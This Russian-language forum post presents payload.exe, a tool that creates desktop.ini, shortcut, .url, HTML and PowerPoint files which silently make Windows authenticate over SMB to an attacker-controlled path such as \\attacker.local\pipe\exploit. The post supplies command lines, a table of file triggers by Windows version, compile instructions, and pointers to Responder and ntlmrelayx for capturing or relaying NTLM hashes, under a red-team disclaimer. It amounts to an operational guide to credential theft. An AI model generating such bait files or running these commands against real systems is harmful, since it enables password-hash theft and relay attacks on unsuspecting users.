HMCoba
Форумчанин
- Регистрация
- 14.06.2025
- Сообщения
- 20
- Реакции
- 26

Payload.exe — генератор файлов для NTLM-атаки через SMB/PIPE
Привет всем!
Хочу поделиться полезным инструментом, который может пригодиться - payload.exe, позволяет генерировать файлы, которые провоцируют NTLM-авторизацию при открытии или просмотре. Полезен в рамках Red Team-практик, пентестов и демонстрации уязвимостей.
Описание:
payload.exe — это инструмент, предназначенный для создания файлов, которые при взаимодействии пользователя с системой (например, просмотр папки, открытие ярлыка, загрузка HTML или Office-документа) инициируют автоматическое подключение Windows к удалённому сетевому ресурсу:
Код:
\\192.168.1.100\share
\\attacker.local\pipe\exploit
Такое подключение вызывает отправку Windows NTLM-аутентификации, что позволяет:
• Перехватывать хэши паролей
• Выполнять relay-атаки через SMB
• Демонстрировать техники социальной инженерии
• Тестировать защищённость Windows-инфраструктуры

Код:
d0…d4 - desktop.ini с различными полями:
d0 - IconFile + LocalizedResourceName + InfoTip
d1 - Только IconFile
d2 - Только LocalizedResourceName
d3 - Только InfoTip
d4 - [LocalizedFileNames] с desktop.ini
u - payload.url (Internet Shortcut)
l - payload.lnk (ярлык с иконкой из сети)
h - payload.html (стили по ссылке res:// или file://)
o - payload.pps (Office-файл с удалённой CSS)

Код:
-t Тип payload-файла (обязательный)
-d Сетевой путь (например, \\192.168.1.100\share)
-p Локальный путь для сохранения файла (по умолчанию — текущая папка)

Создание desktop.ini для подключения к SMB:
Код:
payload.exe -t d1 -d \\192.168.1.100\pipe\exploit -p C:\ExploitFolder
Создание LNK с иконкой по SMB:
Код:
payload.exe -t l -d \\192.168.1.100\share\icon.ico -p C:\Test
Создание HTML, подключающего удалённый CSS:
Код:
payload.exe -t h -d \\192.168.1.100\res\exploit.css -p C:\Test
Создание "офисного" PPS-документа:
Код:
payload.exe -t o -d \\192.168.1.100\style.css -p C:\Test

Тип файла | Версии Windows | Триггер подключения |
---|---|---|
desktop.ini | XP – 10 | Открытие папки в проводнике вызывает загрузку иконки |
.lnk (ярлык) | XP – 11 | Наведение/предпросмотр запускает загрузку иконки по SMB |
.url (Internet Shortcut) | XP – 10 | Открытие ссылки инициирует обращение к сетевому ресурсу |
.html | XP – 10, Outlook | Загрузка внешнего CSS/ресурса при открытии HTML |
.pps (PowerPoint) | Office 2003 – 2016 | При открытии Office запрашивает внешний стиль |
desktop.ini с [LocalizedFileNames] | XP – 10 | Explorer запрашивает локализованное имя — SMB-запрос |
Примечание: в Windows 11 часть механизмов может быть отключена по умолчанию (например, NTLM/SMBv1), но работают при определённых настройках.

В указанной директории появится один из следующих файлов:
Код:
• desktop.ini
• payload.url
• payload.lnk
• payload.html
• payload.pps
При взаимодействии с этими файлами (просмотр, клик, предпросмотр и т.д.) произойдёт фоновое подключение к удалённому ресурсу.

• Работает на Windows (включая старые версии, а также новые — при определённых настройках)
• Не требует запуска .exe пользователем — работает через поведение Explorer/Office
• Использовать только в рамках этического хакинга и пентестов
• НЕ ИСПОЛЬЗОВАТЬ - без согласия владельца инфраструктуры

Код:
• Responder — https://github.com/lgandx/Responder
• ntlmrelayx (из Impacket)
• Metasploit smb-relay
• Cain & Abel (устаревший)

Для Windows:
Код:
cl payload.c /Fe:payload.exe
Или с помощью MinGW:
Код:
gcc payload.c -o payload.exe

Этот код — Proof-of-Concept и используется:
• В обучении
• В Red Team операциях
• Для проверки наличия SMBv1, отсутствия защиты NTLM relay, настройки групповых политик (GPO).
ZIP-архив с исходником и примером .url-payload:
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
Пароль: 1111
Автор: Andres Tarasco Acuna (2006–2008)
Сайт проекта:
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
Используйте с умом. Любая атака без разрешения - нарушение закона.
Последнее редактирование: